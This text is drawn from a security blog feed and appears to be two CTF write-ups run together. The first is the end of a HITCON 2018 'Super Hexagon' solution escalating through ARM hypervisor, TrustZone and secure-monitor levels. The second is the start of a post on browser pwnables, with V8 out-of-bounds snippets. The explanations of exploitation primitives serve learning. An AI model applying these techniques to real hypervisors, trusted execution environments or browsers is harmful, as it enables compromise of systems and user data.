<p>IDA has trouble with some of the spinloop functions that don’t return, so we’ll directly examine the assembly. In the interest of space I’ve trimmed it to the relevant sections and annotated it.</p>
<pre><code class="language-asm=">0x101E0 el2_mmap ; CODE XREF: el2_setup_mappings+A4↓p
0x101E0
0x101E0 LSR X2, X0, #0x15
0x101E4 UBFX X4, X0, #0xC, #9
0x101E8 CMP X0, #0x3B,LSL#12 ; Compare the first arg to 0x3b0000
0x101EC B.EQ loc_1024C
0x101F0 STP X29, X30, [SP,#var_10]!
0x101F4 MOV X29, SP
0x101F8 MOV X3, #0xBFFF
0x101FC MOVK X3, #3,LSL#16
0x10200 CMP X0, X3 ; Make sure the first argument is <= 0x3bffff
; otherwise, print "[VMM] Invalid IPA"
0x10204 B.HI loc_10294
0x10208 MOV X3, #0xBFFF
0x1020C CMP X0, X3
0x10210 B.HI loc_10218 ; Check if the argument is > 0xBFFF
; If so, skip this next instruction
0x10214 TBNZ W1, #7, loc_1026C ; Check the TTE flags for bit 7, indicating writable memory
; If so, reject with error:
; "[VMM] try to map writable pages in RO protected area"
0x10218 loc_10218 ; CODE XREF: el2_mmap+30↑j
0x10218 AND X3, X1, #0x7FFFFFFFFFFF80
0x1021C AND X3, X3, #0xFFC00000000000FF
0x10220 CMP X3, #0x80
0x10224 B.EQ loc_10280 ; 0x80 in the bitflags indicates RWX pages
; [VMM] RWX pages are not allowed
0x10228 MOV X3, #0x40000000
0x1022C ADD X0, X0, X3
0x10230 ORR X0, X0, X1
0x10234 ADD X2, X4, X2,LSL#9
0x10238 ADRP X1, #vmm_translationtable@PAGE
0x1023C ADD X1, X1, #vmm_translationtable@PAGEOFF
0x10240 STR X0, [X1,X2,LSL#3] ; All is well; insert the TTE
0x10244 LDP X29, X30, [SP+0x10+var_10],#0x10
0x10248 RET
</code></pre>
<p>The checks here are pretty robust. We can’t request writable memory in the EL2 code pages, nor can we pass in a too-large physical address. But there’s one oversight - physical addresses are not required by <code class="highlighter-rouge">el2_mmap()</code> to be aligned to 0x1000, and in fact they are never masked off before being written to the table.</p>
<p>The final value inserted into the translation table is <code class="highlighter-rouge">(0x40000000 + arg1) | arg2</code>, so the unmodified bottom bits of <code class="highlighter-rouge">arg</code> will influence the flags of the entry. Therefore, a call like <code class="highlighter-rouge">hypercall(VMM_mmap, 0x14c3, 0x100000)</code> yields the final TTE <code class="highlighter-rouge">0x400114C3</code>, a RW mapping of the EL2 code page<code class="highlighter-rouge">0x40101000</code>, which is inside the RO region! Exploitation is short and sweet, requiring only a single buggy hypercall. With some quick scripting, we can copy our shellcode onto our EL1 virtual address and find it dual-mapped as an EL2 page, yielding execution in hypervisor context.</p>
<h3 id="securecalls-and-playing-telephone">Securecalls, and playing Telephone</h3>
<p>With the completion of EL2 we’ve conquered the entirety of normal world! But til this point we’ve ignored all calls to the secure world, which is where we’re find the other 3 flags we’re still missing. As a brief description, ARM segregates execution space into normal and secure worlds, where the only communication between the two is brokered by the Secure Monitor (EL3). secure world is intended for safeguarding personal data, like fingerprints, payment information, or passwords, and it presents an API accessible over “secure calls” made with the <code class="highlighter-rouge">smc</code> instruction. Secure world has similar exception levels to normal world, with an S-EL1 (“Trusted OS” or “TEE”) running “Trusted Apps” in the S-EL0 userspace. There’s currently no S-EL2 hypervisor equivalent, <a href="https://community.arm.com/developer/ip-products/processors/b/processors-ip-blog/posts/architecting-more-secure-world-with-isolation-and-virtualization">but it is coming in ARMv8.4</a>.</p>
<p><code class="highlighter-rouge">smc</code> is privileged and cannot be made directly by EL0, so in our case the EL0 makes a special syscall to flag its intention to EL1.</p>
<pre><code class="language-asm">0x0401B84 ; signed __int64 tc_register_wsm(void *a1, void *a2)
0x0401B84 EXPORT tc_register_wsm
0x0401B84 tc_register_wsm
0x0401B84 MOV X8, #3
0x0401B88 MOVK X8, #0xFF00,LSL#16 ; x8 becomes 0xFF000003LL
0x0401B8C SVC 0
0x0401B90 RET
0x0401B90 ; End of function tc_register_wsm
0x0401B90
</code></pre>
<p>EL1 contains some basic validation on the securecall arguments in our case, then invokes the <code class="highlighter-rouge">smc</code> instruction to generate a trap.</p>
<pre><code class="language-cpp=">void el1_securecall_passthrough(__int64 a1, __int64 arg1, unsigned __int64 arg2)
{
unsigned __int64 v4;
__int64 v5;
unsigned __int64 i;
signed __int64 v7;
v4 = arg2;
if ( a1 == 0xFF000005i64 )
{
if ( !(arg1 & 0xFFF) )
el1_make_smc(0x83000005i64, (unsigned int)arg1, (unsigned int)arg2, 0i64);
}
else if ( a1 == 0xFF000003i64 )
{
if ( !(arg2 & 0xFFF) && arg2 <= 0x4000 && !(arg1 & 0xFFF) ) // validate physical page
{
v5 = el1_get_page_physaddr(arg1); // make sure the first page is mapped
if ( (_DWORD)v5 != -1 )
{
for ( i = arg1 + 4096; arg1 + v4 > i; i += 4096i64 )
{
v7 = el1_get_page_physaddr(i);
if ( (_DWORD)v7 == -1 || i + v5 - arg1 != v7 ) // make sure subsequent pages are mapped
return;
}
el1_make_smc(0x83000003i64, v5, v4, 0i64); // invoke smc
}
}
}
else if ( a1 == 0xFF000006i64 && !(arg1 & 0xFFF) )
{
el1_make_smc(0x83000006i64, arg1, 0i64, 0i64);
}
}
</code></pre>
<p>EL2 receives the trap inside its handler, since we’re technically under virtualization, and again executes an <code class="highlighter-rouge">smc</code> after some validation.</p>
<pre><code class="language-cpp=29"> if ( arg0 == 0x83000003i64 )
{
if ( arg1 <= 0x3C000 )
arg0 = el2_make_smcall(0x83000003i64, arg1 + 0x8000000);
else
arg0 = -1i64;
}
else
{
arg0 = el2_make_smcall(arg0, arg1);
}
</code></pre>
<p>Finally, we reach our secure monitor code in EL3, which does the actual passover into secure world and sets up the arguments. But who finally receives the call?</p>
<h3 id="s-el0-a-whole-new-secure-world">S-EL0: A whole new (secure) world</h3>
<p>Stepping through EL3’s call to S-EL1/S-EL0 in a debugger quickly yields GDB errors. Luckily, with some quick consulting of the README and included patch files, we notice that the organizers included one that changes QEMU’s debug server to return 32bit ARM registers.</p>
<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">- cc->set_pc = aarch64_cpu_set_pc;
- cc->gdb_read_register = aarch64_cpu_gdb_read_register;
- cc->gdb_write_register = aarch64_cpu_gdb_write_register;
- cc->gdb_num_core_regs = 34;
- cc->gdb_core_xml_file = "aarch64-core.xml";
- cc->gdb_arch_name = aarch64_gdb_arch_name;
</span><span class="gi">+ cc->set_pc = arm_cpu_set_pc;
+ cc->gdb_read_register = arm_cpu_gdb_read_register;
+ cc->gdb_write_register = arm_cpu_gdb_write_register;
+ cc->gdb_num_core_regs = 26;
+ cc->gdb_core_xml_file = "arm-core.xml";
+ cc->gdb_arch_name = arm_gdb_arch_name;
</span></code></pre></div></div>
<p>It seems like the S-EL0 and S-EL1 implementations actually run 32-bit ARM, not aarch64! We can quickly verify this by pulling the qemu-3.0.0 source and building it with the provided patch. We now lose the ability to debug aarch64, but we can break and see ARM instructions in our secure world. To be precise, it is big-endian ARM, but executing mostly in thumb mode. At this point I chose to create a second idb for bios.bin to help with reversing, and rebased it to be appropriate for S-EL1.</p>
<p>Let’s begin by examining the trustlet blob passed to <code class="highlighter-rouge">tc_init_trustlet()</code> back in EL0. The code registered a blob of length 0x750, beginning with the string literal “HITCON\x00\x00”.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000: 4849 5443 4f4e 0000 6b12 0000 0010 0000 HITCON..k.......
00000010: 8406 0000 0020 0000 a800 0000 0000 1000 ..... ..........
00000020: 7010 0800 b0b5 8eb0 00af 7860 41f2 6c03 p.........x`A.l.
00000030: c0f2 1803 1b68 7b63 42f2 0003 c0f2 0003 .....h{cB.......
00000040: 07f1 0c04 1d46 0fcd 0fc4 0fcd 0fc4 2b68 .....F........+h
00000050: 2380 7b6b 3b63 3b6b 0122 1a60 3b6b 0c33 #.{k;c;k.".`;k.3
00000060: 07f1 0c02 1146 1846 00f0 f8fa 0020 00f0 .....F.F..... ..
00000070: 0ffb b0b5 90b0 00af 7860 7b68 5b68 fb63 ........x`{h[h.c
00000080: fb6b 092b 09d8 40f2 0002 c0f2 1002 fb6b .k.+..@........k
00000090: db00 1344 5b68 002b 1ad1 42f2 2403 c0f2 ...D[h.+..B.$...
</code></pre></div></div>
<p>The consistency of the first 0x20 bytes makes them look like a blob header, meaning this is probably a custom executable format. To understand it better, we’ll have to do some basic reversing of S-EL1.</p>
<p>According to EL3, S-EL1 is loaded at physical address 0xE400000 and from offset 0x20000 in <code class="highlighter-rouge">bios.bin</code>. It’s nonsensical in our aarch64 idb, but in our 32bit one we find a distinct interrupt table at that offset. Inside the reset handler we find the usual MSR twiddling and MMU setup. However, we’re instead interested in the function that handles secure calls, since that is the code responsible for <code class="highlighter-rouge">tci_init_trustlet()</code>. That handler occurs at 0x2087C, where we find 4 possible secure calls.</p>
<pre><code class="language-cpp=">void sel1_handle_securecall(int cmd, int arg0, int arg1)
{
int v0;
switch ( cmd )
{
case 0:
v0 = sel1_mmap_world_shared_memory(arg0, arg1);
sel1_return_val_to_normal_world(0x83000007, v0);
return;
case 1:
v0 = sel1_unmap_from_sel0(arg0, arg1);
sel1_return_val_to_normal_world(0x83000007, v0);
return;
case 2:
v0 = sel1_load_trusted_app(arg0, arg1);
sel1_return_val_to_normal_world(0x83000007, v0);
return;
case 3:
v0 = sel1_call_trusted_app(arg0);
sel1_return_val_to_normal_world(0x83000007, v0);
return;
default:
sel1_return_val_to_normal_world(0x83000007, -1);
return;
}
}
</code></pre>
<p>With the exception of <code class="highlighter-rouge">sel1_unmap_from_sel0</code>, we’ve seen these securecalls invoked from EL0. We can peek into<code class="highlighter-rouge">sel1_load_trusted_app</code> to better understand the binary format</p>
<pre><code class="language-cpp=">signed int sel1_load_trusted_inner(_DWORD *trustlet, unsigned int length)
{
unsigned int v5;
unsigned int v6;
unsigned int len;
_BYTE *v8;
if ( !sel1_check_sha256(trustlet, length) ) // verify trustlet hash
return -1;
v8 = trustlet + trustlet[4] + 0x24; // get the data section
len = (((trustlet[4] - 1) >> 12) + 1) << 12;
if ( sel1_map_page_into_sel0(trustlet[3], len, 10) == -1 )
return -1;
v6 = (((trustlet[6] - 1) >> 12) + 1) << 12; // grab the bss length
if ( trustlet[6] )
{
if ( sel1_map_page_into_sel0(trustlet[5], v6, 14) == -1 )
return -1;
}
v5 = (((trustlet[8] - 1) >> 12) + 1) << 12;
if ( trustlet[8] )
{
if ( sel1_map_page_into_sel0(trustlet[7], v5, 14) == -1 )
return -1;
}
if ( sel1_map_page_into_sel0(0xFF8000u, 0x8000, 14) == -1 ) // map stack
return -1;
sel1_memset(trustlet[3], 0, len);
sel1_memcpy(trustlet[3], trustlet + 0x24, trustlet[4]);// copy in text section
if ( trustlet[6] )
{
sel1_memset(trustlet[5], 0, v6);
sel1_memcpy(trustlet[5], v8, trustlet[6]);
}
if ( trustlet[8] )
sel1_memset(trustlet[7], 0, v5);
sel1_memset(0xFF8000, 0, 0x8000); // set up stack
sel0_stored_retaddr = trustlet[2];
sel0_cmdbuf_addr = trustlet[8] + trustlet[7] - 4;
return 0;
}
</code></pre>
<p>After verifying the sha256 of the image against a hardcoded hash, it loads a text, data, and bss section from the buffer. No relocations, so ASLR is off. Armed with this information, we can load the file into IDA and lay out segments at fixed addresses to get an understand of S-EL0.</p>
<p>S-EL0 is a small binary composed of big-endian thumb code. In its command handler, it receives a pointer to a “tci” buffer, where the first dword is a command type. Only <code class="highlighter-rouge">load_key</code> and <code class="highlighter-rouge">save_key</code> are defined, but of interest is that <code class="highlighter-rouge">save_key</code> allocates buffers for the keys via a simple dlmalloc implementation. It invokes <code class="highlighter-rouge">malloc()</code> for a new key index, and if an existing key index is given to overwrite, it will first <code class="highlighter-rouge">free()</code> the value at that position.</p>
<p>The <code class="highlighter-rouge">save_key</code> and <code class="highlighter-rouge">load_key</code> functions operate on the handle passed by userspace, where that handle is actually the buffer’s S-EL0 virtual address. This means we can operate on any “buffer” by passing in a arbitrary “handle”.</p>
<p>This heap allocator uses the same chunk header as glibc malloc would use for a smallbin. Rather than multiple freelists based on chunk size, it puts all chunks into a single one comparable to glibc’s unsortedbin list. It does support mmap’d chunks when the size requested is >0x40000. When freeing a non-mmap’d chunk, it will attempt consolidation with the previous next chunks.</p>
<p>After spending some time auditing the heap implementation, I became interested in the mmap chunk code, since if we could get a writable mapping to the page the chunk was in, we’d be able to directly write to the chunk header. Here’s the relevant <code class="highlighter-rouge">mmap</code> syscall handler in S-EL1</p>
<pre><code class="language-cpp=">_BYTE * sel1_mmap_syscall(__int16 req_virtaddr, int size)
{
int v4;
_BYTE *v5;
v4 = size;
if ( req_virtaddr & 0xFFF )
return -1;
if ( size & 0xFFF )
return -1;
if ( !size )
return -1;
v5 = sel1_find_contig_virtpage(size);
if ( v5 == -1 || sel1_map_page_into_sel0(v5, v4, 10) == -1 )
return -1;
sel1_memset(v5, 0, v4);
return v5;
}
</code></pre>
<p>The code attempts to find a contigous set of virtual addresses to suit the mapping, then <code class="highlighter-rouge">sel1_map_page_into_sel0</code> will choose physical addresses and update the translation tables. Now, take a look at the <code class="highlighter-rouge">sel1_map_world_shared_memory</code> securecall handler we had access to via EL0.</p>
<pre><code class="language-cpp=">signed int sel1_mmap_world_shared_memory(unsigned int physaddr, int size)
{
signed int v2;
int v6;
if ( !size
|| size & 0xFFF
|| physaddr & 0xFFF
|| physaddr < 0x40000000
|| (v6 = sel1_find_contig_virtpage(size), v6 == -1)
|| sel1_map_page_tables(v6, physaddr, size, 2) == -1 )
{
v2 = -1;
}
else
{
v2 = v6;
}
return v2;
}
</code></pre>
<p>This code uses the same virtual address range! Finally, note the unused <code class="highlighter-rouge">munmap</code> syscall and securecall. With these primitives, we’ll actually use the interaction of S-EL1 to pwn S-EL0 in the following way.</p>
<ol>
<li>Make a mapping in S-EL0 of size 0x40000. We need a buffer this big in S-EL0 as a source for the memcpy() initializing our chunk.</li>
<li>Use the unmap securecall to unmap the first page of the mapping</li>
<li>Map in a single normal world physical page as world shared memory. This will land on our just-freed virtual address</li>
<li>Fill up the trusted app request to cause an mmap’d chunk of size 0x40000 to be created</li>
<li>Free the first page of that chunk with the unmap securecall</li>
<li>Map over it to fully control the chunk header</li>
</ol>
<p>Once we have control of the chunk header, we’ll twiddle the bits to convert it to a normal chunk, and then abuse heap consolidation’s unsafe-unlink to trigger a write to the saved return address in <code class="highlighter-rouge">sel0_free</code>. Everything in S-EL0 is mapped RWX, so we can just return directly to our shellcode buffer and gain S-EL0 execution.</p>
<p>As a final note, ARM doesn’t have <code class="highlighter-rouge">msr</code> in the same way aarch64 does, so we read the flag via the <code class="highlighter-rouge">mrc</code> instruction</p>
<pre><code class="language-arm">mrc p15,3,r1,c15,c12,0
str r1, [r0]
mrc p15,3,r1,c15,c12,1
str r1, [r0,#4]
mrc p15,3,r1,c15,c12,2
str r1, [r0,#8]
mrc p15,3,r1,c15,c12,3
str r1, [r0,#0xC]
mrc p15,3,r1,c15,c12,4
str r1, [r0,#0x10]
mrc p15,3,r1,c15,c12,5
str r1, [r0,#0x14]
mrc p15,3,r1,c15,c12,6
str r1, [r0,#0x18]
mrc p15,3,r1,c15,c12,7
str r1, [r0,#0x1c]
</code></pre>
<h3 id="s-el1-failing-upwards">S-EL1: Failing upwards</h3>
<p>To solve S-EL0 we performed some significant reversing on the syscall and securecall interaces of S-EL1. When moving on to S-EL1, my first intuition was to examine the precise operation of the <code class="highlighter-rouge">munmap</code> and <code class="highlighter-rouge">mmap</code> handlers. These interested me because both secure and normal world pages could be mapped into the virtual address space. Both <code class="highlighter-rouge">mmap</code> and <code class="highlighter-rouge">map_world_shared_memory</code> store physical pages into the same table. However, the <code class="highlighter-rouge">munmap</code> syscall is identical to the securecall, and doesn’t special-case pages from different worlds. Thinking along those lines, the first bug I noticed was inside <code class="highlighter-rouge">map_world_shared_memory</code>. It validates that <code class="highlighter-rouge">physaddr < 0x40000000</code>, preventing users from mapping pages below the VIRT_MEM assigned by QEMU.</p>
<pre><code class="language-cpp=">while ( 1 )
{
if ( !len )
return 0;
if ( sel1_update_page_table(virtaddr, physaddr, prot) == -1 )
break;
virtaddr += 0x1000;
physaddr += 0x1000;
len -= 4096;
}
</code></pre>
<p>However later, there’s no checking for integer overflow. Making a call like <code class="highlighter-rouge">map_wsm(0xFFFFF000, 0x2000)</code> would result in a virtual address corresponding to first page of EL3 becoming accessible to our S-EL0 shellcode. And in fact, that does happen! But there’s a catch - Since the pages are mapped VIRT_FLASH, QEMU will allow reads but silently (!) drops writes (without faulting) to that address range. Confusingly, gdb can still write to those pages, likely since the QEMU gdbserver doesn’t distinguish between physical page types.</p>
<pre><code class="language-gdb">gef> x/i $pc
=> 0x237d318: str r3, [r1]
gef> x/xw $r1
0x237c80c: 0x91000042
gef> p $r3
$12 = 0x41414141
gef> stepi
gef> x/xw $r1
0x237c80c: 0x91000042
</code></pre>
<p>Taking a step back, it’s likely that any S-EL1 bugs would be present in a syscall, or at least require the use of a syscall. This would require players to have to pwn S-EL0 first, which makes sense from the standpoint of the CTF. One interesting syscall is <code class="highlighter-rouge">signal</code>, which allows the trusted application to define a signal handler. The HITCON blob uses this to catch errors and populate the user’s buffer with an error code and string.</p>
<pre><code class="language-cpp=">signed int sel1_set_signal_handler(int a1, unsigned int a2)
{
if ( a2 < 0x2400000 && a1 == 11 )
sel0_sighandler_addr = a2;
return -1;
}
</code></pre>
<p>S-EL1 stores the user’s argument in a global in its memory. Whenever a data or prefetch abort occurs, execution flows to <code class="highlighter-rouge">sel1_handle_signal</code> to check for the presence of a defined handler. That function will determine whether the handler is thumb or arm mode (checking the bottom bit) and populate state accordingly.</p>
<pre><code class="language-arm">0x08001588 sel1_data_abort
0x08001588 STR LR, [SP,#0x3C] ; Store to Memory
0x0800158C MRS LR, SPSR ; Transfer PSR to Register ; <---- [A]
0x08001590 STR LR, [SP,#0x40] ; Store to Memory
0x08001594 CPS #0x13 ; Change Processor State
0x08001598 BL sel1_save_regs ; Branch with Link
0x0800159C ---------------------------------------------------------------------------
0x0800159C LDR R8, [SP,#0x44] ; Load from Memory
0x080015A0 CPS #0x1F ; Change Processor State
0x080015A4 MOV SP, R8 ; Rd = Op2
0x080015A8 MOV R0, #0x17 ; Rd = Op2
0x080015AC BLX sel1_handle_signal ; Change stored pc to saved handler
0x080015B0 B sel1_return_from_interrupt
0x0800187C sel1_return_from_interrupt
0x0800187C CPS #0x13 ; Change Processor State
0x08001880 LDR R0, [SP,#arg_40] ; Load from Memory
0x08001884 MSR SPSR_cxsf, R0 ; Transfer Register to PSR ; <---- [B]
0x08001888 B loc_8001870
0x08001870 BL sel1_restore_regs
0x08001874 LDR LR, [SP,#0x3C] ; Load from Memory
0x08001878 MOVS PC, LR ; Rd = Op2
</code></pre>
<p><code class="highlighter-rouge">sel1_handle_signal</code> primarily is responsible for overwriting the saved PC value. Though this is a data abort handler, it actually looks most similar to a syscall handler, and reuses a lot of code from that. However, data aborts can occur in either S-EL0 or in S-EL1. At point A, the handler saves off the existing SPSR value, containing the current exception level, onto the stack. Later at B, it unambiguously restores to that saved state! The duplicated path from the syscall handler didn’t account for the fact that a syscall in S-EL1 would return to EL3, but a data abort in S-EL1 still returns to S-EL1.</p>
<p>In other words, if we define a signal handler in S-EL0 then trigger a data abort in S-EL1, we’ll execute our shellcode with S-EL1’s exception level.</p>
<h3 id="el3-escaping-the-matrix">EL3: Escaping the matrix</h3>
<p>EL3 is the final frontier for our challenge. At this point I’d done a reasonable amount of reversing on it already to determine where other exception levels were mapped and how securecalls are passed back and forth through the secure monitor code. After performing system setup, the actual core of EL3 is very small, mainly serving as a shuttling secure monitor service between normal and secure worlds. To this end, S-EL1 is capable of pointing its TTEs at EL3 pages to get an accessible mapping. However, the EL3 code executes directly off the read-only VIRT_FLASH pages, so we cannot write to its codepages directly.</p>
<p>Let’s examine code responsible for shuttling a secure call between worlds, in pursuit of a suitable write target.</p>
<pre><code class="language-cpp=63">if ( cmd != 0x83000007 )
{
sub_D28();
sub_310();
}
el3_switch_world(0);
retvalptr = el3_get_world_scratch(1u);
el3_set_current_world(1u);
el3_set_el1_sp(1u);
*retvalptr = v9;
result = retvalptr;
</code></pre>
<p>This code is responsible from returning to Normal World’s with an error code. It retrieves a pointer to the Normal World’s (id 1) saved execution state, then overwrites the stored <code class="highlighter-rouge">x0</code> register value. It also transitions back to Normal World before returning.</p>
<pre><code class="language-cpp=">QWORD * el3_get_world_scratch(unsigned int a1)
{
return *(_QWORD **)(0xE002410 + 8i64 * a1);
}
</code></pre>
<p>As we can see, the scratch buffers are stored as the first two qwords in an array at <code class="highlighter-rouge">0xE002410</code>. This page is within the VIRT_SECURE_MEM physical page range, so we can point to it in our S-EL1 TTE to read and write its contents. If we write a pointer to <code class="highlighter-rouge">0xE002418</code>, we obtain arbitrary write by returning a 64bit value from Secure World. ASLR isn’t enabled on the EL3 stack, so it’s easy enough to clobber the saved return address and jump directly to our shellcode payload running in EL3.</p>
<h3 id="parting-thoughts">Parting Thoughts</h3>
<p>Over the past several years, CTFs have become increasingly involved and reflective of real world vulnerability research. CTF is a common route for new talent to break into the industry, and for professionals to use their skills in competition. Challenges are often written based on inspiration from bugs the authors have seen elsewhere, and Super Hexagon definitely felt that way to me.</p>
<p>HITCON is always one of the top CTFs of the year, and 2018 did not disappoint. The organizers had forgone having a final that year and so the challenges during the online event were all difficult and novel. I would consider it one of my favorite events of the year, and based on recent updates to their website, it appears that HITCON 2019 will be taking place. I’d encourage anyone who has made it this far to participate.</p>
<p>Until then, you can find my full solution scripts and notes for Super Hexagon on my Github <a href="https://github.com/nafod/super-hexagon">here</a>.</p>
<h3 id="other-writeups">Other Writeups</h3>
<p><a href="https://hernan.de/blog/2018/10/30/super-hexagon-a-journey-from-el0-to-s-el3/">Super Hexagon: A Journey from EL0 to S-EL3, by Grant Hernandez (Kernel Sanders)</a></p>
<p><a href="https://github.com/pwning/public-writeup/blob/master/hitcon2018/super_hexagon/README.md">PPP’s writeup</a></p>
<p><a href="https://github.com/balsn/ctf_writeup/tree/master/20181019-hitconctf#super-hexagon">Balsn’s writeup</a></p>One of the most interesting and unique CTF challenges I’ve seen over the past year was the “Super Hexagon” challenge from HITCON 2018. The challenge is unlike any other in several ways. A single bios.bin is distributed to the player that contains six (!) different levels to pwn, spread across all current exception levels, and involving both armv7 and aarch64 execution.advent-browserpwn 20182019-02-13T07:31:06+00:002019-02-13T07:31:06+00:00https://nafod.net/blog/2019/02/13/advent-browserpwn-2018<p>Last December (2018), I created an advent calendar on the Japanese site <a href="https://adventar.org">adventar.org</a> after seeing some Japanese CTFers creating a PWN-focused calendar there.</p>
<p>You can find it here: <a href="https://adventar.org/calendars/3435">https://adventar.org/calendars/3435</a></p>
<p>The general theme of my calendar was focused around solving browser pwnables from recent CTFs, with a strong focus on V8. I tried to arrange the challenges in such a way that the learning curve would be reasonable and to give myself enough time to solve them. Things got even better when <a href="http://35c3ctf.ccc.ac">35C3CTF</a>, which took place right near the end of December, featured a fun V8 challenge that I added to the list. Overall, I finished the last challenge sometime around the last week of January 2019.</p>
<p>Below I’ll briefly discuss each problem I completed. Many of these have been discussed in depth elsewhere on the internet, so I’ll try to keep my contributions short and focus on general thoughts. I freely admit this is not a tutorial post, but more of a summary of my calendar.</p>
<p>Warning, spoilers follow. If you are just interested in solve scripts, check the bottom of the post.</p>
<h3 id="blazefox-blazectf-2018">“Blazefox” (BlazeCTF 2018)</h3>
<p>BlazeFox was the sole non-V8 challenge on this list. It involved a straightforward method added onto the Array class that would directly set the underlying length field to 420. Since obtaining corrupted length fields on an array is sort of the end state that browser exploits coalesce to, it was a great starting point for me to understand the underlying fundamentals (properties? elements? inline-elements? maps? backing stores?). Overcl0k just published <a href="https://doar-e.github.io/blog/2018/11/19/introduction-to-spidermonkey-exploitation/">a great blogpost</a> on this challenge, so I’ll not discuss it too much here.</p>
<p>My strategy for browser bugs of this category (those that lead to a corrupted length field) is to use the corrupted array to directly manipulate an adjacent victim ArrayBuffer. ArrayBuffer objects usually consist of few elements beyond a “backing store” pointer, representing the pointer to a raw data buffer, and a length field. By manipulating the backing store, we obtain an arbitrary read/write memory primitive from our weaker relative read/write. From there, I used the same method as describe in <a href="https://phoenhex.re/2017-06-21/firefox-structuredclone-refleak">this phoenhex article</a> to overwrite a GOT entry in libxul.</p>
<h3 id="v8-challenge-csaw-2018-finals">V8 Challenge (CSAW 2018 Finals)</h3>
<p>Unlike Blazefox, this challenge doesn’t directly hand us a bug. Rather, it defines a new interpreter method <code class="highlighter-rouge">Array.prototype.replaceIf(index, callbackfn, replacement)</code> as a builtin, giving us a chance to do some small-scale bughunting. In this case, the bug is related to proxies and a lack of state-flushing after allowing Javascript execution to occur. Javascript proxies are objects that let us override normal object behavior for common operations (getter/setter/method calls), and can be a common source of bugs for code expecting default behavior. We can define a handler to override certain property accessors to fake out the length field when it is requested.</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">handler</span> <span class="o">=</span> <span class="p">{</span>
<span class="na">get</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">obj</span><span class="p">,</span> <span class="nx">prop</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">prop</span> <span class="o">==</span> <span class="dl">'</span><span class="s1">length</span><span class="dl">'</span><span class="p">)</span>
<span class="k">return</span> <span class="mh">0x1337</span><span class="p">;</span>
<span class="k">else</span>
<span class="k">return</span> <span class="nx">obj</span><span class="p">[</span><span class="nx">prop</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="k">new</span> <span class="nb">Proxy</span><span class="p">(</span><span class="k">new</span> <span class="nb">Array</span><span class="p">(</span><span class="mh">0x8</span><span class="p">),</span> <span class="nx">handler</span><span class="p">).</span><span class="nx">replaceIf</span><span class="p">(</span><span class="nx">idx</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">elem</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="nx">idx</span> <span class="o">==</span> <span class="mh">0x33</span><span class="p">);</span> <span class="c1">// index we want to overwrite</span>
<span class="p">},</span> <span class="mh">0x13370000</span><span class="p">);</span>
</code></pre></div></div>
<p>Now, we can use the <code class="highlighter-rouge">replaceIf</code> function to read and write OOB from our array. At this point, the next few exploit steps are similar to Blazefox: find our victim ArrayBuffer, grab its backing store, construct our <code class="highlighter-rouge">r64()/w64()</code> functions, etc. How to get PC? As of 2018, V8 now ships without RWX pages enabled by default in the renderer process. However, this challenge has re-disabled that feature for us. So we can walk class/structure offsets to reach the RWX page corresponding to a JSFunction and simply write our shellcode there.</p>
<h3 id="roll-a-d8-plaidctf-2018">“Roll a d8” (PlaidCTF 2018)</h3>
<p>This challenge was the first n-day challenge of the calendar, targeting crbug 821137. Players were given just a V8 version and the following regression test:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Copyright 2018 the V8 project authors. All rights reserved.</span>
<span class="c1">// Use of this source code is governed by a BSD-style license that can be</span>
<span class="c1">// found in the LICENSE file.</span>
<span class="c1">// Tests that creating an iterator that shrinks the array populated by</span>
<span class="c1">// Array.from does not lead to out of bounds writes.</span>
<span class="kd">let</span> <span class="nx">oobArray</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">let</span> <span class="nx">maxSize</span> <span class="o">=</span> <span class="mi">1028</span> <span class="o">*</span> <span class="mi">8</span><span class="p">;</span>
<span class="nb">Array</span><span class="p">.</span><span class="k">from</span><span class="p">.</span><span class="nx">call</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">oobArray</span> <span class="p">},</span> <span class="p">{[</span><span class="nb">Symbol</span><span class="p">.</span><span class="nx">iterator</span><span class="p">]</span> <span class="p">:</span> <span class="nx">_</span> <span class="o">=></span> <span class="p">(</span>
<span class="p">{</span>
<span class="na">counter</span> <span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="nx">next</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">counter</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">counter</span> <span class="o">></span> <span class="nx">maxSize</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">oobArray</span><span class="p">.</span><span class="nx">length</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">return</span> <span class="p">{</span><span class="na">done</span><span class="p">:</span> <span class="kc">true</span><span class="p">};</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span><span class="na">value</span><span class="p">:</span> <span class="nx">result</span><span class="p">,</span> <span class="na">done</span><span class="p">:</span> <span class="kc">false</span><span class="p">};</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">)</span> <span class="p">});</span>
<span class="nx">assertEquals</span><span class="p">(</span><span class="nx">oobArray</span><span class="p">.</span><span class="nx">length</span><span class="p">,</span> <span class="nx">maxSize</span><span class="p">);</span>
<span class="c1">// iterator reset the length to 0 just before returning done, so this will crash</span>
<span class="c1">// if the backing store was not resized correctly.</span>
<span class="nx">oobArray</span><span class="p">[</span><span class="nx">oobArray</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x41414141</span><span class="p">;</span>
</code></pre></div></div>
